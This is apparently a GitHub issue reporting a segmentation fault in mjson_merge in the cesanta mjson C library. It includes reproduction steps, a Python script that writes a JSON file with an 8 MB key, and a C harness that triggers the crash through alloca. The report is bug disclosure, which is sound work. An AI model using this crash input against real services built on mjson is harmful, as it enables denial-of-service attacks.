SEGV on unknown address has occurred in function mjson_merge at mjson.c:826 #75
Description
Description
When reading in a larger key, it will cause alloca to allocate an incorrect memory address, resulting in SEGV
Version
commit 696969cd0d35399cc66075f5ec7a96e23ba4a89b (HEAD -> master, origin/master, origin/HEAD) Author: novlean <novlean@gmail.com> Date: Wed Mar 5 18:00:56 2025 +0000 Update README.md added mongoose Steps to reproduce
$ git clone https://github.com/cesanta/mjson.git $ cd msjon $ python3 poc.py $ clang -g -O0 harness.c ./src/mjson.c $ ./harnessYou can use the following Python script to generate PoC
import os if __name__ == "__main__": with open("poc.json", "w") as f: f.write("{") f.write('"{}":1,'.format("A"*8388608)) f.write("}")The harness is as follows
#include <stdio.h> #include <stdlib.h> #include <unistd.h> #include "`src/mjson.h" static int print_to_buffer(const char *buf, int len, void *userdata) { write(1, buf, len); return len; } int main() { char* s = malloc(2147483700); FILE* f = fopen("./poc.json", "r"); fread(s, 2147483699, 1, f); const char *s2 = "{\"age\": 31, \"city\": \"New York\"}"; char buffer[100]; char *p = buffer; int bytes_written = mjson_merge(s, strlen(s), s2, strlen(s2), print_to_buffer, &p); return 0; }